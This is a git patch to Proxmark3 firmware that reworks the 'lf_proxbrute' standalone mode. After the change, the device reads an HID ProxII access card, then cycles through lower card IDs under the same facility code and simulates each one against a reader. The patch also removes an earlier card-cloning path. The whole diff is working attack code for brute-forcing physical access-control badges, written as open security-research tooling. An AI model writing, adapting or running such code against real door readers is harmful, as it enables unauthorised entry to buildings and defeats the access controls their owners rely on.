From 871445212ec86dd83090897ca6f876c3bd1b0568 Mon Sep 17 00:00:00 2001 From: iceman1001 Date: Fri, 13 Sep 2019 14:10:08 +0200 Subject: [PATCH] chg 'lf proxebrute standalone' - simplified it. No need for clone, or multiple slots, LED A = read / record, flashing LED A 12 times, failed reader and next click try again, LED C == proxbrute, all leds flash when exiting standalone mode --- armsrc/Standalone/lf_proxbrute.c | 197 +++++++++++-------------------- 1 file changed, 68 insertions(+), 129 deletions(-) diff --git a/armsrc/Standalone/lf_proxbrute.c b/armsrc/Standalone/lf_proxbrute.c index 8044cbde9..5d435c3ee 100644 --- a/armsrc/Standalone/lf_proxbrute.c +++ b/armsrc/Standalone/lf_proxbrute.c @@ -18,8 +18,6 @@ #include "ticks.h" #include "lfops.h" -#define OPTS 2 - void ModInfo(void) { DbpString(" LF HID ProxII bruteforce - aka Proxbrute (Brad Antoniewicz)"); } @@ -30,151 +28,92 @@ void RunMod() { Dbprintf(">> LF HID proxII bruteforce a.k.a ProxBrute Started (Brad Antoniewicz) <<"); FpgaDownloadAndGo(FPGA_BITSTREAM_LF); - uint32_t high[OPTS], low[OPTS]; - int selected = 0; - int playing = 0; - int cardRead = 0; + uint32_t high, low; - // Turn on selected LED - LED(selected + 1, 0); +#define STATE_READ 0 +#define STATE_BRUTE 1 + + uint8_t state = STATE_READ; for (;;) { + WDT_HIT(); // exit from SamyRun, send a usbcommand. if (data_available()) break; - // Was our button held down or pressed? - int button_pressed = BUTTON_HELD(1000); - SpinDelay(300); + // Was our button held down or pressed? + int button_pressed = BUTTON_HELD(280); + if ( button_pressed != BUTTON_HOLD ) + continue; // Button was held for a second, begin recording - if (button_pressed > 0 && cardRead == 0) { - LEDsoff(); - LED(selected + 1, 0); - LED(LED_D, 0); + if ( state == STATE_READ ) { + + LEDsoff(); + LED_A_ON(); + WAIT_BUTTON_RELEASED(); - // record DbpString("[=] starting recording"); - // wait for button to be released - while (BUTTON_PRESS()) - WDT_HIT(); - /* need this delay to prevent catching some weird data */ - SpinDelay(500); + // findone, high, low, no ledcontrol (A) + CmdHIDdemodFSK(1, &high, &low, 0); - CmdHIDdemodFSK(1, &high[selected], &low[selected], 0); - Dbprintf("[=] recorded %x %x %08x", selected, high[selected], low[selected]); + Dbprintf("[=] recorded | %x%08x", high, low); - LEDsoff(); - LED(selected + 1, 0); - // Finished recording - // If we were previously playing, set playing off - // so next button push begins playing what we recorded - playing = 0; - cardRead = 1; - } else if (button_pressed > 0 && cardRead == 1) { - LEDsoff(); - LED(selected + 1, 0); - LED(LED_A, 0); - - // record - Dbprintf("[=] cloning %x %x %08x", selected, high[selected], low[selected]); - - // wait for button to be released - while (BUTTON_PRESS()) - WDT_HIT(); - - /* need this delay to prevent catching some weird data */ - SpinDelay(500); - - CopyHIDtoT55x7(0, high[selected], low[selected], 0); - Dbprintf("[=] cloned %x %x %08x", selected, high[selected], low[selected]); - - LEDsoff(); - LED(selected + 1, 0); - // Finished recording - - // If we were previously playing, set playing off - // so next button push begins playing what we recorded - playing = 0; - cardRead = 0; - } - - // Change where to record (or begin playing) - else if (button_pressed) { - // Next option if we were previously playing - if (playing) - selected = (selected + 1) % OPTS; - playing = !playing; - - LEDsoff(); - LED(selected + 1, 0); - - // Begin transmitting - if (playing) { - LED(LED_B, 0); - DbpString("[=] playing"); - // wait for button to be released - while (BUTTON_PRESS()) - WDT_HIT(); - - /* START PROXBRUTE */ - - /* - ProxBrute - brad a. - foundstone - - Following code is a trivial brute forcer once you read a valid tag - the idea is you get a valid tag, then just try and brute force to - another priv level. The problem is that it has no idea if the code - worked or not, so its a crap shoot. One option is to time how long - it takes to get a valid ID then start from scratch every time. - */ - if (selected == 1) { - DbpString("[=] entering ProxBrute Mode"); - Dbprintf("[=] current Tag: Selected = %x Facility = %08x ID = %08x", selected, high[selected], low[selected]); - LED(LED_A, 0); - LED(LED_C, 0); - for (uint16_t i = low[selected] - 1; i > 0; i--) { - if (BUTTON_PRESS()) { - DbpString("[-] told to stop"); - break; - } - - Dbprintf("[=] trying Facility = %08x ID %08x", high[selected], i); - CmdHIDsimTAGEx(high[selected], i, 0, 20000); - SpinDelay(500); - } - - } else { - DbpString("[=] RED is lit, not entering ProxBrute Mode"); - Dbprintf("[=] %x %x %x", selected, high[selected], low[selected]); - CmdHIDsimTAGEx(high[selected], low[selected], 0, 20000); - DbpString("[=] done playing"); - } - - /* END PROXBRUTE */ - - - if (BUTTON_HELD(1000) > 0) - goto out; - - /* We pressed a button so ignore it here with a delay */ - SpinDelay(300); - - // when done, we're done playing, move to next option - selected = (selected + 1) % OPTS; - playing = !playing; - LEDsoff(); - LED(selected + 1, 0); - } else { - while (BUTTON_PRESS()) - WDT_HIT(); + // got nothing. blink and loop. + if ( high == 0 && low == 0 ) { + SpinErr( LED_A, 100, 12); + DbpString("[=] only got zeros, retry recording after click"); + continue; } + + SpinErr(LED_A, 250, 2); + state = STATE_BRUTE; + continue; + + } else if ( state == STATE_BRUTE ) { + + LED_C_ON(); // Simulate + WAIT_BUTTON_RELEASED(); + + + /* + ProxBrute - brad a. - foundstone + + Following code is a trivial brute forcer once you read a valid tag + the idea is you get a valid tag, then just try and brute force to + another priv level. The problem is that it has no idea if the code + worked or not, so its a crap shoot. One option is to time how long + it takes to get a valid ID then start from scratch every time. + */ + DbpString("[=] entering ProxBrute mode"); + Dbprintf("[=] simulating | %08x%08x", high, low); + + for (uint16_t i = low - 1; i > 0; i--) { + + if (data_available()) break; + + // Was our button held down or pressed? + int button_pressed = BUTTON_HELD(280); + if ( button_pressed != BUTTON_HOLD ) break; + + Dbprintf("[=] trying Facility = %08x ID %08x", high, i); + + // high, i, ledcontrol, timelimit 20000 + CmdHIDsimTAGEx(high, i, false, 20000); + + SpinDelay(100); + } + + state = STATE_READ; + SpinErr( (LED_A | LED_C ), 250, 2); + LEDsoff(); } } -out: - DbpString("[=] exiting"); + + SpinErr( (LED_A | LED_B | LED_C | LED_D), 250, 5); + DbpString("[=] You can take the shell back :) ..."); LEDsoff(); }